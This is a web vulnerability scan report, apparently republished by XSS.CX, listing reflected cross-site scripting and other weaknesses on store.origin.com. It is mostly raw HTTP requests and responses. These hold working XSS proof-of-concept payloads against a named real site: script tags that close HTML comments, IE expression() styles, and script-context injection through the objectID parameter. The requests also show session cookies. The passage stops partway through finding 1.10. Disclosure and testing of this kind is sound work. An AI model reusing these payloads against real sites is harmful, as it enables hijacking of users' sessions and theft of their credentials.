XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, store.origin.com

Report generated by XSS.CX at Sat Jun 25 09:45:35 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. Cross-site scripting (reflected)

1.1. http://store.origin.com/ [name of an arbitrarily supplied request parameter]

1.2. http://store.origin.com/DRHM/store [name of an arbitrarily supplied request parameter]

1.3. http://store.origin.com/servlet/ControllerServlet [name of an arbitrarily supplied request parameter]

1.4. http://store.origin.com/servlet/ControllerServlet [objectID parameter]

1.5. http://store.origin.com/store [name of an arbitrarily supplied request parameter]

1.6. http://store.origin.com/store [name of an arbitrarily supplied request parameter]

1.7. http://store.origin.com/store [objectID parameter]

1.8. http://store.origin.com/store/ea/en_US/DisplayHomeTier3Page/StyleID.1364100/StyleVersion.247 [name of an arbitrarily supplied request parameter]

1.9. http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.219720800 [name of an arbitrarily supplied request parameter]

1.10. http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800 [name of an arbitrarily supplied request parameter]

1.11. http://store.origin.com/store/ea/en_US/pd/ThemeID.718200/productID.201797000 [name of an arbitrarily supplied request parameter]

1.12. http://store.origin.com/store/ea/home/ [name of an arbitrarily supplied request parameter]

2. Cross-domain Referer leakage

2.1. http://store.origin.com/DRHM/store

2.2. http://store.origin.com/store

2.3. http://store.origin.com/store

3. Cross-domain script include

3.1. http://store.origin.com/

3.2. http://store.origin.com/DRHM/store

3.3. http://store.origin.com/store

3.4. http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.219720800

3.5. http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800

3.6. http://store.origin.com/store/ea/en_US/pd/ThemeID.718200/productID.201797000

3.7. http://store.origin.com/store/ea/home/

4. Cookie without HttpOnly flag set

4.1. http://store.origin.com/DRHM/Storefront/Site/ea/cm/multimedia/foresee/foresee-surveydef.js

4.2. http://store.origin.com/DRHM/Storefront/Site/ea/images/promo/img_arrow.jpg

4.3. http://store.origin.com/store

5. Content type incorrectly stated

5.1. http://store.origin.com/DRHM/Storefront/Site/ea/pb/images/EA_favicon.ico

5.2. http://store.origin.com/store



1. Cross-site scripting (reflected)  next
There are 12 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://store.origin.com/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 412c5--><script>alert(1)</script>d59f8e2efa2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?412c5--><script>alert(1)</script>d59f8e2efa2=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=154926219549,0)
Date: Fri, 24 Jun 2011 13:44:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app49
Content-Length: 60544


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308923040451:NODE=c2a4901:THREA
...[SNIP]...
<!--!esi:include src="/store?412c5--><script>alert(1)</script>d59f8e2efa2=1&Action=DisplayESIPage&Currency=USD&ESIHC=bf89624e&Env=BASE&Locale=en_US&SiteID=ea&StyleID=1364100&StyleVersion=247&ThemeID=718200&ceid=173716600&cename=TopHeader&id=HomePage&script>
...[SNIP]...

1.2. http://store.origin.com/DRHM/store [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /DRHM/store

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 26d07--><script>alert(1)</script>60365ea3b11 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /DRHM/store?Action=ContinueShopping&SiteID=ea&Locale=en_US&ThemeID=718200&Env=BASE&26d07--><script>alert(1)</script>60365ea3b11=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store?Action=DisplayPage&Env=BASE&IsGift=no&Locale=en_US&SiteID=ea&id=ThreePgCheckoutShoppingCartPage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_sivo=US%3AEASTORENA%3ANONE; s_ria=flash%2010%7Csilverlight%20not%20detected; s_cc=true; s_sq=eaeacom%2Ceaeacomna%2Ceastorena%3D%2526pid%253DNA%25253AUS%25253ASTORE%25253ANONE%25253ASTORE%25253ANONE%25253AEASTORENA%25253ANONE%25253ASHOPPINGCART%2526pidt%253D1%2526oid%253Dhttp%25253A//store.origin.com/DRHM/store%25253FAction%25253DContinueShopping%252526SiteID%25253Dea%252526Locale%25253Den_US%252526ThemeID%25253D718200%252526Env%2526ot%253DA

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=142044730526,0)
Date: Fri, 24 Jun 2011 14:39:33 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app42
Content-Length: 64955


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308926373194:NODE=c2a4201:THREA
...[SNIP]...
<!--!esi:include src="/store?26d07--><script>alert(1)</script>60365ea3b11=1&Action=DisplayESIPage&Currency=USD&ESIHC=f0fabaf3&Env=BASE&Locale=en_US&SiteID=ea&StyleID=1364100&StyleVersion=247&ThemeID=718200&ceid=173716600&cename=TopHeader&id=HomePage"-->
...[SNIP]...

1.3. http://store.origin.com/servlet/ControllerServlet [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /servlet/ControllerServlet

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 970ec<x%20style%3dx%3aexpression(alert(1))>1e64672ebab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 970ec<x style=x:expression(alert(1))>1e64672ebab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /servlet/ControllerServlet?Action=DisplayPage&id=ProductFinderLogicPage&Locale=en_US&SiteID=ea&objectID=54552300&option=1&970ec<x%20style%3dx%3aexpression(alert(1))>1e64672ebab=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0

Response (redirected)

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: VISITOR_ID=971D4E8DFAED4367E8FABBC8C336D7CFAFA20171532B684A; expires=Sat, 23-Jun-2012 20:31:09 GMT; path=/
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=116275073079,0)
Date: Fri, 24 Jun 2011 14:41:57 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app42
Content-Length: 396


<!-- REQUEST ID: TIME=1308926517144:NODE=c2a4201:THREAD=47 -->
<!--!esi:include src="/store?970ec<x style=x:expression(alert(1))>1e64672ebab=1&Action=DisplayESIPage&Currency=USD&ESIHC=944044ed&Env=BASE&Locale=en_US&SiteID=ea&ThemeID=718200&ceid=173741100&cename=ProductFinder&id=ProductFinderLogicPage&objectID=54552300&option=1"-->
...[SNIP]...

1.4. http://store.origin.com/servlet/ControllerServlet [objectID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /servlet/ControllerServlet

Issue detail

The value of the objectID request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7896e%3balert(1)//e97f0c45884 was submitted in the objectID parameter. This input was echoed as 7896e;alert(1)//e97f0c45884 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /servlet/ControllerServlet?Action=DisplayPage&id=ProductFinderJSPage&Locale=en_US&SiteID=ea&objectID=545523007896e%3balert(1)//e97f0c45884 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0

Response (redirected)

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/javascript;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=99095095834,0)
Date: Fri, 24 Jun 2011 14:40:10 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app42
Content-Length: 6948


<!-- REQUEST ID: TIME=1308926410564:NODE=c2a4201:THREAD=36 -->
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=f0fabaf3&Env=BASE&Locale=en_US&SiteID=ea&ThemeID=718200&ceid=173
...[SNIP]...

//document.getElementById("dr_load").style.display = "none";
loadMessage("off");
changeSelectState(false);
}
}
dataRequest(545523007896e;alert(1)//e97f0c45884,1);


<!--!/esi:include -->
...[SNIP]...

1.5. http://store.origin.com/store [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b9d22<x%20style%3dx%3aexpression(alert(1))>5630e67cca4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b9d22<x style=x:expression(alert(1))>5630e67cca4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /store?Action=DisplayPage&id=ProductFinderLogicPage&Locale=en_US&SiteID=ea&objectID=54552300&option=1&b9d22<x%20style%3dx%3aexpression(alert(1))>5630e67cca4=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_sivo=US%3AEASTORENA%3ANONE; s_cc=true; s_ria=flash%2010%7Csilverlight%20not%20detected; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=197879135792,0)
Date: Fri, 24 Jun 2011 14:36:47 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app53
Content-Length: 398


<!-- REQUEST ID: TIME=1308926207827:NODE=c2a5301:THREAD=3806 -->
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=d9487485&Env=BASE&Locale=en_US&SiteID=ea&ThemeID=718200&b9d22<x style=x:expression(alert(1))>5630e67cca4=1&ceid=172065900&cename=ProductFinder&id=ProductFinderLogicPage&objectID=54552300&option=1"-->
...[SNIP]...

1.6. http://store.origin.com/store [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 7353c--><script>alert(1)</script>772938624bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store?Action=DisplayPage&Env=BASE&IsGift=no&Locale=en_US&SiteID=ea&id=ThreePgCheckoutShoppingCartPage&7353c--><script>alert(1)</script>772938624bb=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_sivo=US%3AEASTORENA%3ANONE; s_ria=flash%2010%7Csilverlight%20not%20detected; s_cc=true; s_sq=eaeacom%2Ceaeacomna%2Ceastorena%3D%2526pid%253DNA%25253AUS%25253ASTORE%25253ANONE%25253ASTORE%25253ANONE%25253AEASTORENA%25253ANONE%25253APRODUCTFINDERPAGE%2526pidt%253D1%2526oid%253Dhttp%25253A//store.origin.com/store/ea/en_US/AddItemToRequisition/ThemeID.718200%252526productID%25253D226783800%2526ot%253DA

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=107684976519,0)
Date: Fri, 24 Jun 2011 14:39:17 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app42
Content-Length: 26212


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308926357939:NODE=c2a4201:THREA
...[SNIP]...
<!--!esi:include src="/store?7353c--><script>alert(1)</script>772938624bb=1&Action=DisplayESIPage&Currency=USD&ESIHC=f0fabaf3&Env=BASE&IsGift=no&Locale=en_US&SiteID=ea&StyleID=1364100&StyleVersion=247&ThemeID=718200&ceid=173716600&cename=TopHeader&id=ThreePgCheckoutShopping
...[SNIP]...

1.7. http://store.origin.com/store [objectID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store

Issue detail

The value of the objectID request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 30c70%3balert(1)//bd42b8ad6f6 was submitted in the objectID parameter. This input was echoed as 30c70;alert(1)//bd42b8ad6f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /store?Action=DisplayPage&id=ProductFinderJSPage&Locale=en_US&SiteID=ea&objectID=5455230030c70%3balert(1)//bd42b8ad6f6 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/javascript;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=21785430387,0)
Date: Fri, 24 Jun 2011 14:36:02 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app53
Content-Length: 6952


<!-- REQUEST ID: TIME=1308926162482:NODE=c2a5301:THREAD=1735 -->
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=be87e1f2&Env=BASE&Locale=en_US&SiteID=ea&ThemeID=718200&ceid=1
...[SNIP]...

//document.getElementById("dr_load").style.display = "none";
loadMessage("off");
changeSelectState(false);
}
}
dataRequest(5455230030c70;alert(1)//bd42b8ad6f6,1);


<!--!/esi:include -->
...[SNIP]...

1.8. http://store.origin.com/store/ea/en_US/DisplayHomeTier3Page/StyleID.1364100/StyleVersion.247 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store/ea/en_US/DisplayHomeTier3Page/StyleID.1364100/StyleVersion.247

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a9c7d--><script>alert(1)</script>84252b80866 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/ea/en_US/DisplayHomeTier3Page/StyleID.1364100/StyleVersion.247?a9c7d--><script>alert(1)</script>84252b80866=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORA_WX_SESSION="10.2.11.49:260-0#0"; JSESSIONID=7FD36F5B7EF2D6619ACFC964D7FBFAC2; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=822805002.260.0000

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=64731921166,0)
Date: Fri, 24 Jun 2011 13:44:14 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app49
Content-Length: 38619


<!-- REQUEST ID: TIME=1308923054923:NODE=c2a4901:THREAD=36 -->
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=bf89624e&Env=BASE&Locale=en_US&SiteID=ea&StyleID=1364100&StyleVersion=247&ThemeID=718200&a9c7d--><script>alert(1)</script>84252b80866=1&ceid=173715400&cename=HomeTier3&id=HomeTier3Page&script>
...[SNIP]...

1.9. http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.219720800 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.219720800

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 52629--><script>alert(1)</script>32e863371e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.219720800?52629--><script>alert(1)</script>32e863371e0=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; s_sivo=US%3AEASTORENA%3ANONE; s_ria=flash%2010%7Csilverlight%20not%20detected; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=172109476423,0)
Date: Fri, 24 Jun 2011 14:39:08 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app42
Content-Length: 40166


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308926348703:NODE=c2a4201:THREA
...[SNIP]...
<!--!esi:include src="/store?52629--><script>alert(1)</script>32e863371e0=1&Action=DisplayESIPage&Currency=USD&ESIHC=24e5cc79&Env=BASE&Locale=en_US&SiteID=ea&StyleID=1476100&StyleVersion=12&ThemeID=718200&ceid=173716600&cename=TopHeader&id=ProductFinderPage&productID=219720
...[SNIP]...

1.10. http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload be90c--><script>alert(1)</script>39260cc850a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

